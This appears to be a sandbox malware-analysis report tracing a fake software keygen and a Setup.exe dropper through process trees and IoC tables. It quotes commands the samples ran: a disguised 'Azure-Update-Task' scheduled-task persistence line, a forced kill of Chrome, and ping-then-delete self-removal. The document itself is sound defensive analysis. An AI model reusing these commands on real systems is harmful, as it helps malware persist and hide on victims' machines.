Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exeTue136037e6ffe49ce8.tmpsetup.tmpCalculator.exe

pid process

888 City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe
5408 Tue136037e6ffe49ce8.tmp
8028 setup.tmp
392
392
8548 Calculator.exe
392
392

pid	process
888	City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe
5408	Tue136037e6ffe49ce8.tmp
8028	setup.tmp
392
392
8548	Calculator.exe
392
392

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

malware.exeCrowdInspect.exeCrowdInspect64.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeSetup.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exeN6nJ3oy_c9uGXimEU1sNmAbl.exerOa7Med5tUaEVSeLw_3RQa3S.exeQyPwot4QIN3DyCJqH3uWauR6.exemqSrAqHFMGt7EAO9C4kKycar.exeB1cQEjfN5wvIYW9wsbF3Mipy.exeBVmvoWdUrHGF9M0d_Eo5ELvM.exeWFs2R34gCIfKUZ61dr3jvV2X.exeMfR5P3jtbVt2lnIZPTc_I1w1.exeYEB_JgasjnRYhFUnFKmSY0AB.exey9_luMJjfyhqSStaRQoTk8V0.exeTue130c270d23c79.exegeOjkJ0mVcduzvKZWwFgVYyf.exeTue13c1be0d8f62bc.exeypFHd8JXVHsHFi1sHWSBSDc8.exeTue132b1547125d9.executm3.exeinst3.exeTue13bbed6e0bb6.exeTue13a47d89c50.exeTue13a98da3f882e5.exeTue13bd9cb08d6.exeTue136037e6ffe49ce8.exeTue136037e6ffe49ce8.tmppowershell.exeyn9mbhlnOvWHCn46u7SFsmoE.exefFavAFyAiEPvlZ6R3Adu8GmC.exeb94cV6KOavGXOWpZ1FiI6sCb.exeTue136037e6ffe49ce8.tmpsvchost.exeinst1.exeSoft1WW02.exeOhCY_U9qjCDoxRO6LjrusrvX.exeUUVaP6vwQ16WWIFuMy_gPOOv.exeVIAFqhHGN6vGW6AC2Q5yfoYr.exe8c7AOkmXVdatkeJ_O43dbF51.exepostback.exesetup.exesetup_2.exeeDiZ4D2V6widG4UWk7yPBh7R.exeschtasks.exesetup.exesetup.tmpqMaxZyfrRyDDEoYOBts12TGA.exerundll32.exeJQHhJMSb_HqRFhaAJ3fyhxBF.exepostback.exeH8mDPgJlNyEyJnfjqbA4GKMH.exeYUcpDvUwBIF2lNDBnMnNnkxO.exeMZebuESZgvLwRSXDPGqFrfuI.exekujVG5GGe2ek8fuaYQkw4LR5.exe4B8BhDQ9bykNQPmYdw9BOluf.exeX5cijgKQfMjKnRprwU8YreFX.exe

pid	process
2388	malware.exe
2388	malware.exe
1136	CrowdInspect.exe
2392	CrowdInspect64.exe
2336	MicrosoftEdge.exe
1424	MicrosoftEdgeCP.exe
1424	MicrosoftEdgeCP.exe
1972	Setup.exe
644	setup_x86_x64_install.exe
3440	setup_installer.exe
3060	setup_install.exe
1656	N6nJ3oy_c9uGXimEU1sNmAbl.exe
3208	rOa7Med5tUaEVSeLw_3RQa3S.exe
2328	QyPwot4QIN3DyCJqH3uWauR6.exe
1928	mqSrAqHFMGt7EAO9C4kKycar.exe
3972	B1cQEjfN5wvIYW9wsbF3Mipy.exe
3424	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
2856	WFs2R34gCIfKUZ61dr3jvV2X.exe
3576	MfR5P3jtbVt2lnIZPTc_I1w1.exe
2412	YEB_JgasjnRYhFUnFKmSY0AB.exe
744	y9_luMJjfyhqSStaRQoTk8V0.exe
708	Tue130c270d23c79.exe
2896	geOjkJ0mVcduzvKZWwFgVYyf.exe
4228	Tue13c1be0d8f62bc.exe
3508	ypFHd8JXVHsHFi1sHWSBSDc8.exe
4240	Tue132b1547125d9.exe
4604	cutm3.exe
4708	inst3.exe
4584	Tue13bbed6e0bb6.exe
4752	Tue13a47d89c50.exe
5088	Tue13a98da3f882e5.exe
1684	Tue13bd9cb08d6.exe
1956	Tue136037e6ffe49ce8.exe
4860	Tue136037e6ffe49ce8.tmp
5136	powershell.exe
5152	yn9mbhlnOvWHCn46u7SFsmoE.exe
5228	fFavAFyAiEPvlZ6R3Adu8GmC.exe
5316	b94cV6KOavGXOWpZ1FiI6sCb.exe
5408	Tue136037e6ffe49ce8.tmp
6780	svchost.exe
5932	inst1.exe
6748	Soft1WW02.exe
4408	OhCY_U9qjCDoxRO6LjrusrvX.exe
3936	UUVaP6vwQ16WWIFuMy_gPOOv.exe
5028	VIAFqhHGN6vGW6AC2Q5yfoYr.exe
2856	WFs2R34gCIfKUZ61dr3jvV2X.exe
3248	8c7AOkmXVdatkeJ_O43dbF51.exe
6728	postback.exe
6620	setup.exe
888	setup_2.exe
388	eDiZ4D2V6widG4UWk7yPBh7R.exe
7208	schtasks.exe
7824	setup.exe
8028	setup.tmp
7312	qMaxZyfrRyDDEoYOBts12TGA.exe
7664	rundll32.exe
5968	JQHhJMSb_HqRFhaAJ3fyhxBF.exe
2612	postback.exe
7856	H8mDPgJlNyEyJnfjqbA4GKMH.exe
3588	YUcpDvUwBIF2lNDBnMnNnkxO.exe
7884	MZebuESZgvLwRSXDPGqFrfuI.exe
7940	kujVG5GGe2ek8fuaYQkw4LR5.exe
8140	4B8BhDQ9bykNQPmYdw9BOluf.exe
7308	X5cijgKQfMjKnRprwU8YreFX.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

CrowdInspect.exeSetup.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exe

description	pid	process	target process
PID 1136 wrote to memory of 2392	1136	CrowdInspect.exe	CrowdInspect64.exe
PID 1136 wrote to memory of 2392	1136	CrowdInspect.exe	CrowdInspect64.exe
PID 1972 wrote to memory of 1940	1972	Setup.exe	W8EjwAjsi3zFHp_O5IgjQTqX.exe
PID 1972 wrote to memory of 1940	1972	Setup.exe	W8EjwAjsi3zFHp_O5IgjQTqX.exe
PID 644 wrote to memory of 3440	644	setup_x86_x64_install.exe	setup_installer.exe
PID 644 wrote to memory of 3440	644	setup_x86_x64_install.exe	setup_installer.exe
PID 644 wrote to memory of 3440	644	setup_x86_x64_install.exe	setup_installer.exe
PID 3440 wrote to memory of 3060	3440	setup_installer.exe	setup_install.exe
PID 3440 wrote to memory of 3060	3440	setup_installer.exe	setup_install.exe
PID 3440 wrote to memory of 3060	3440	setup_installer.exe	setup_install.exe
PID 3060 wrote to memory of 1600	3060	setup_install.exe	cmd.exe
PID 3060 wrote to memory of 1600	3060	setup_install.exe	cmd.exe
PID 3060 wrote to memory of 1600	3060	setup_install.exe	cmd.exe
PID 1972 wrote to memory of 1656	1972	Setup.exe	N6nJ3oy_c9uGXimEU1sNmAbl.exe
PID 1972 wrote to memory of 1656	1972	Setup.exe	N6nJ3oy_c9uGXimEU1sNmAbl.exe
PID 1972 wrote to memory of 1656	1972	Setup.exe	N6nJ3oy_c9uGXimEU1sNmAbl.exe
PID 1972 wrote to memory of 2748	1972	Setup.exe	4uXq3GhA2yYG7l00zi_5YFml.exe
PID 1972 wrote to memory of 2748	1972	Setup.exe	4uXq3GhA2yYG7l00zi_5YFml.exe
PID 1972 wrote to memory of 2748	1972	Setup.exe	4uXq3GhA2yYG7l00zi_5YFml.exe
PID 1972 wrote to memory of 3208	1972	Setup.exe	rOa7Med5tUaEVSeLw_3RQa3S.exe
PID 1972 wrote to memory of 3208	1972	Setup.exe	rOa7Med5tUaEVSeLw_3RQa3S.exe
PID 1972 wrote to memory of 3208	1972	Setup.exe	rOa7Med5tUaEVSeLw_3RQa3S.exe
PID 1972 wrote to memory of 2328	1972	Setup.exe	QyPwot4QIN3DyCJqH3uWauR6.exe
PID 1972 wrote to memory of 2328	1972	Setup.exe	QyPwot4QIN3DyCJqH3uWauR6.exe
PID 1972 wrote to memory of 2328	1972	Setup.exe	QyPwot4QIN3DyCJqH3uWauR6.exe
PID 3060 wrote to memory of 3940	3060	setup_install.exe	cmd.exe
PID 3060 wrote to memory of 3940	3060	setup_install.exe	cmd.exe
PID 3060 wrote to memory of 3940	3060	setup_install.exe	cmd.exe
PID 1972 wrote to memory of 3424	1972	Setup.exe	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
PID 1972 wrote to memory of 3424	1972	Setup.exe	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
PID 1972 wrote to memory of 3424	1972	Setup.exe	BVmvoWdUrHGF9M0d_Eo5ELvM.exe
PID 1972 wrote to memory of 3972	1972	Setup.exe	B1cQEjfN5wvIYW9wsbF3Mipy.exe
PID 1972 wrote to memory of 3972	1972	Setup.exe	B1cQEjfN5wvIYW9wsbF3Mipy.exe
PID 1972 wrote to memory of 3972	1972	Setup.exe	B1cQEjfN5wvIYW9wsbF3Mipy.exe
PID 1972 wrote to memory of 1928	1972	Setup.exe	mqSrAqHFMGt7EAO9C4kKycar.exe
PID 1972 wrote to memory of 1928	1972	Setup.exe	mqSrAqHFMGt7EAO9C4kKycar.exe
PID 1972 wrote to memory of 1928	1972	Setup.exe	mqSrAqHFMGt7EAO9C4kKycar.exe
PID 1972 wrote to memory of 2856	1972	Setup.exe	WFs2R34gCIfKUZ61dr3jvV2X.exe
PID 1972 wrote to memory of 2856	1972	Setup.exe	WFs2R34gCIfKUZ61dr3jvV2X.exe
PID 1972 wrote to memory of 744	1972	Setup.exe	y9_luMJjfyhqSStaRQoTk8V0.exe
PID 1972 wrote to memory of 744	1972	Setup.exe	y9_luMJjfyhqSStaRQoTk8V0.exe
PID 1972 wrote to memory of 744	1972	Setup.exe	y9_luMJjfyhqSStaRQoTk8V0.exe
PID 1972 wrote to memory of 2896	1972	Setup.exe	geOjkJ0mVcduzvKZWwFgVYyf.exe
PID 1972 wrote to memory of 2896	1972	Setup.exe	geOjkJ0mVcduzvKZWwFgVYyf.exe
PID 1972 wrote to memory of 2896	1972	Setup.exe	geOjkJ0mVcduzvKZWwFgVYyf.exe
PID 1972 wrote to memory of 2656	1972	Setup.exe	WsKBEzuxaPjQpYj11ghzQynd.exe
PID 1972 wrote to memory of 2656	1972	Setup.exe	WsKBEzuxaPjQpYj11ghzQynd.exe
PID 1972 wrote to memory of 2656	1972	Setup.exe	WsKBEzuxaPjQpYj11ghzQynd.exe
PID 1972 wrote to memory of 3508	1972	Setup.exe	ypFHd8JXVHsHFi1sHWSBSDc8.exe
PID 1972 wrote to memory of 3508	1972	Setup.exe	ypFHd8JXVHsHFi1sHWSBSDc8.exe
PID 1972 wrote to memory of 3508	1972	Setup.exe	ypFHd8JXVHsHFi1sHWSBSDc8.exe
PID 1972 wrote to memory of 4044	1972	Setup.exe	USAUkIeyEMXxC37_VirxwDso.exe
PID 1972 wrote to memory of 4044	1972	Setup.exe	USAUkIeyEMXxC37_VirxwDso.exe
PID 1972 wrote to memory of 4044	1972	Setup.exe	USAUkIeyEMXxC37_VirxwDso.exe
PID 1972 wrote to memory of 2412	1972	Setup.exe	YEB_JgasjnRYhFUnFKmSY0AB.exe
PID 1972 wrote to memory of 2412	1972	Setup.exe	YEB_JgasjnRYhFUnFKmSY0AB.exe
PID 1972 wrote to memory of 2412	1972	Setup.exe	YEB_JgasjnRYhFUnFKmSY0AB.exe
PID 1972 wrote to memory of 2900	1972	Setup.exe	oDgBhLX9H2wUXa4t35viNJ5_.exe
PID 1972 wrote to memory of 2900	1972	Setup.exe	oDgBhLX9H2wUXa4t35viNJ5_.exe
PID 1972 wrote to memory of 2900	1972	Setup.exe	oDgBhLX9H2wUXa4t35viNJ5_.exe
PID 1972 wrote to memory of 3576	1972	Setup.exe	MfR5P3jtbVt2lnIZPTc_I1w1.exe
PID 1972 wrote to memory of 3576	1972	Setup.exe	MfR5P3jtbVt2lnIZPTc_I1w1.exe
PID 1972 wrote to memory of 3576	1972	Setup.exe	MfR5P3jtbVt2lnIZPTc_I1w1.exe
PID 1972 wrote to memory of 3720	1972	Setup.exe	y_QaUUThIYKqSe5cUViDSYMb.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2660

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6768

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:820

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
2⤵
PID:14036

C:\Users\Admin\AppData\Roaming\uvadbtb
C:\Users\Admin\AppData\Roaming\uvadbtb
2⤵
PID:11204

C:\Users\Admin\AppData\Roaming\uvadbtb
C:\Users\Admin\AppData\Roaming\uvadbtb
3⤵
PID:8660

C:\Users\Admin\AppData\Roaming\rgadbtb
C:\Users\Admin\AppData\Roaming\rgadbtb
2⤵
PID:10072

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
2⤵
PID:12208

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:10792

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:9432

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
4⤵
- Loads dropped DLL
- Creates scheduled task(s)
- Suspicious use of SetWindowsHookEx
PID:7208

C:\Users\Admin\AppData\Roaming\uvadbtb
C:\Users\Admin\AppData\Roaming\uvadbtb
2⤵
PID:10712

C:\Users\Admin\AppData\Roaming\uvadbtb
C:\Users\Admin\AppData\Roaming\uvadbtb
3⤵
PID:12140

C:\Users\Admin\AppData\Roaming\rgadbtb
C:\Users\Admin\AppData\Roaming\rgadbtb
2⤵
PID:14212

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
2⤵
PID:5184

C:\Users\Admin\AppData\Roaming\dfadbtb
C:\Users\Admin\AppData\Roaming\dfadbtb
2⤵
PID:12508

C:\Users\Admin\AppData\Roaming\uradbtb
C:\Users\Admin\AppData\Roaming\uradbtb
2⤵
PID:11760

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:11788

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:5296

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
4⤵
- Creates scheduled task(s)
PID:13400

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:10396

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:12900

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:11640

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:13736

C:\Users\Admin\AppData\Local\2209492a-d66e-4f81-a995-bc9456a39b6c\A41C.exe
C:\Users\Admin\AppData\Local\2209492a-d66e-4f81-a995-bc9456a39b6c\A41C.exe --Task
2⤵
PID:5628

C:\Users\Admin\AppData\Local\2209492a-d66e-4f81-a995-bc9456a39b6c\A41C.exe
C:\Users\Admin\AppData\Local\2209492a-d66e-4f81-a995-bc9456a39b6c\A41C.exe --Task
3⤵
PID:4964

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
2⤵
PID:11772

C:\Users\Admin\AppData\Roaming\dfadbtb
C:\Users\Admin\AppData\Roaming\dfadbtb
2⤵
PID:13688

C:\Users\Admin\AppData\Roaming\uradbtb
C:\Users\Admin\AppData\Roaming\uradbtb
2⤵
PID:6180

C:\Users\Admin\AppData\Roaming\uvadbtb
C:\Users\Admin\AppData\Roaming\uvadbtb
2⤵
PID:9376

C:\Users\Admin\AppData\Roaming\rgadbtb
C:\Users\Admin\AppData\Roaming\rgadbtb
2⤵
PID:4064

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:11948

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
PID:4504

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
2⤵
PID:13244

C:\Users\Admin\AppData\Local\2209492a-d66e-4f81-a995-bc9456a39b6c\A41C.exe
C:\Users\Admin\AppData\Local\2209492a-d66e-4f81-a995-bc9456a39b6c\A41C.exe --Task
2⤵
PID:6632

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:9964

C:\Users\Admin\AppData\Roaming\rgadbtb
C:\Users\Admin\AppData\Roaming\rgadbtb
2⤵
PID:13656

C:\Users\Admin\AppData\Roaming\uradbtb
C:\Users\Admin\AppData\Roaming\uradbtb
2⤵
PID:948

C:\Users\Admin\AppData\Roaming\dfadbtb
C:\Users\Admin\AppData\Roaming\dfadbtb
2⤵
PID:5568

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
2⤵
PID:10640

C:\Users\Admin\AppData\Local\Temp\malware.exe
"C:\Users\Admin\AppData\Local\Temp\malware.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2388

C:\Users\Admin\Desktop\CrowdInspect.exe
"C:\Users\Admin\Desktop\CrowdInspect.exe"
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1136

C:\Users\Admin\Desktop\CrowdInspect64.exe
"C:\Users\Admin\Desktop\CrowdInspect64.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2392

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Новый текстовый документ.txt
1⤵
PID:880

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2336

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1424

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:648

C:\Users\Admin\Desktop\City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe
"C:\Users\Admin\Desktop\City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe"
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:2704

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
PID:6404

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:5468

C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe"
4⤵
- Executes dropped EXE
PID:6444

C:\Users\Admin\AppData\Local\Temp\RarSFX3\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md1_1eaf.exe"
4⤵
PID:7052

C:\Users\Admin\AppData\Local\Temp\RarSFX3\DownFlSetup133.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\DownFlSetup133.exe"
4⤵
PID:10932

C:\Users\Admin\AppData\Roaming\4639822.exe
"C:\Users\Admin\AppData\Roaming\4639822.exe"
5⤵
PID:3480

C:\Users\Admin\AppData\Roaming\2924152.exe
"C:\Users\Admin\AppData\Roaming\2924152.exe"
5⤵
PID:3440

C:\Users\Admin\AppData\Roaming\6120828.exe
"C:\Users\Admin\AppData\Roaming\6120828.exe"
5⤵
PID:5300

C:\Users\Admin\AppData\Roaming\8787609.exe
"C:\Users\Admin\AppData\Roaming\8787609.exe"
5⤵
PID:920

C:\Users\Admin\AppData\Roaming\7503424.exe
"C:\Users\Admin\AppData\Roaming\7503424.exe"
5⤵
PID:6440

C:\Users\Admin\AppData\Roaming\6189554.exe
"C:\Users\Admin\AppData\Roaming\6189554.exe"
5⤵
PID:3956

C:\Users\Admin\AppData\Local\Temp\RarSFX3\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\pub1.exe"
4⤵
PID:8448

C:\Users\Admin\AppData\Local\Temp\RarSFX3\low.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\low.exe"
4⤵
PID:12012

C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
4⤵
PID:14108

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:11172

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:13244

C:\Users\Admin\AppData\Local\Temp\RarSFX3\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Install.exe"
4⤵
PID:7064

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:5404

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:9536

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:9232

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
keygen-step-6.exe
3⤵
- Executes dropped EXE
PID:5456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL
4⤵
PID:4516

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:7548

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:5236

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1972

C:\Users\Admin\Pictures\Adobe Films\W8EjwAjsi3zFHp_O5IgjQTqX.exe
"C:\Users\Admin\Pictures\Adobe Films\W8EjwAjsi3zFHp_O5IgjQTqX.exe"
2⤵
- Executes dropped EXE
PID:1940

C:\Users\Admin\Pictures\Adobe Films\QyPwot4QIN3DyCJqH3uWauR6.exe
"C:\Users\Admin\Pictures\Adobe Films\QyPwot4QIN3DyCJqH3uWauR6.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 1528
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:7752

C:\Users\Admin\Pictures\Adobe Films\rOa7Med5tUaEVSeLw_3RQa3S.exe
"C:\Users\Admin\Pictures\Adobe Films\rOa7Med5tUaEVSeLw_3RQa3S.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 1532
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3964

C:\Users\Admin\Pictures\Adobe Films\4uXq3GhA2yYG7l00zi_5YFml.exe
"C:\Users\Admin\Pictures\Adobe Films\4uXq3GhA2yYG7l00zi_5YFml.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2748

C:\Users\Admin\Pictures\Adobe Films\N6nJ3oy_c9uGXimEU1sNmAbl.exe
"C:\Users\Admin\Pictures\Adobe Films\N6nJ3oy_c9uGXimEU1sNmAbl.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
